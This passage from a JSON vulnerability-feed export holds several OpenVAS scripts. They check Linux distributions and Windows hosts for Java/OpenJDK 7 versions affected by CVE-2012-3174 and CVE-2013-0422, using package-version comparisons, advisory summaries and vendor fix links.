script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1693-1\");\n script_name(\"Ubuntu Update for openjdk-7 USN-1693-1\");\n\n script_summary(\"Check for the Version of openjdk-7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-cacao\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"icedtea-7-jre-jamvm\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-headless\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-lib\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"openjdk-7-jre-zero\", ver:\"7u9-2.3.4-0ubuntu1.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:09:21", "description": "Check for the Version of java-1_7_0-openjdk", "cvss3": {}, "published": "2013-03-11T00:00:00", "type": "openvas", "title": "SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:850427", "href": "http://plugins.openvas.org/nasl.php?oid=850427", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0199_1.nasl 8448 2018-01-17 16:18:06Z teissa $\n#\n# SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle &gt; 32 bit shifts\n - G422525: Fix building with PaX enabled kernels.\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n * add openjdk-7-src-b147-awt-crasher.patch\n - turn pulseaudio off on pre 11.4 distros\";\n\n\ntag_affected = \"java-1_7_0-openjdk on openSUSE 12.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.opensuse.org/opensuse-security-announce/2013-01/msg00025.html\");\n script_id(850427);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-11 18:29:19 +0530 (Mon, 11 Mar 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2013:0199_1\");\n script_name(\"SuSE Update for java-1_7_0-openjdk openSUSE-SU-2013:0199-1 (java-1_7_0-openjdk)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1_7_0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-13T12:52:04", "description": "This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "openvas", "title": "Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2017-11-08T00:00:00", "id": "OPENVAS:803156", "href": "http://plugins.openvas.org/nasl.php?oid=803156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_java_se_mult_code_execution_vuln_win.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_insight = \"- An error in Java Management Extensions (JMX) MBean components which allows\n remote attackers to execute arbitrary code via unspecified vectors.\n - An unspecified error exists within the Libraries subcomponent.\n\n NOTE: The vendor reports that only version 7.x is affected. However,\n some security researchers indicate that some 6.x versions may\n be affected\";\n\ntag_impact = \"Successful exploitation allows remote attackers to execute arbitrary code\n via unspecified vectors,\n Impact Level: System/Application\";\n\ntag_affected = \"Oracle Java version 7 before Update 11 on windows\";\ntag_solution = \"Upgrade to Oracle Java 7 Update 11 or later\n For updates refer to\n http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\";\ntag_summary = \"This host is installed with Oracle Java SE and is prone to multiple\n code execution vulnerabilities.\";\n\nif(description)\n{\n script_id(803156);\n script_version(\"$Revision: 7699 $\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-17 12:41:59 +0530 (Thu, 17 Jan 2013)\");\n script_name(\"Oracle Java SE Multiple Remote Code Execution Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/51820/\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1027972\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/625617\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_require_keys(\"Sun/Java/JRE/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\n## Variable Initialization\njreVer = \"\";\n\n## Get JRE Version from KB\njreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\n\nif(jreVer)\n{\n ## Check for Oracle Java SE versions 1.7 to 1.7.0_10\n if(version_in_range(version:jreVer, test_version:\"1.7\", test_version2:\"1.7.0.10\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:54", "description": "Check for the Version of java-1.7.0-openjdk", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-01-26T00:00:00", "id": "OPENVAS:865170", "href": "http://plugins.openvas.org/nasl.php?oid=865170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"java-1.7.0-openjdk on Fedora 18\";\ntag_insight = \"The OpenJDK runtime environment.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\");\n script_id(865170);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:33:40 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2013-0422\", \"CVE-2012-3174\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-0853\");\n script_name(\"Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java-1.7.0-openjdk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:09:47", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-01-25T00:00:00", "id": "OPENVAS:881557", "href": "http://plugins.openvas.org/nasl.php?oid=881557", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n \n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n \n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\");\n script_id(881557);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:37:56 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.el5_9.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096967.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865170\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:33:40 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2013-0422\", \"CVE-2012-3174\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-0853\");\n script_name(\"Fedora Update for java-1.7.0-openjdk FEDORA-2013-0853\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.7.0-openjdk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"java-1.7.0-openjdk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:55", "description": "Oracle Linux Local Security Checks ELSA-2013-0165", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0165", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123748", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123748", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0165.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123748\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:08:02 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0165\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0165 - java-1.7.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0165\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0165.html\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.0.1.el5_9.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.0.1.el5_9.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.0.1.el5_9.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.0.1.el5_9.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.0.1.el5_9.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", 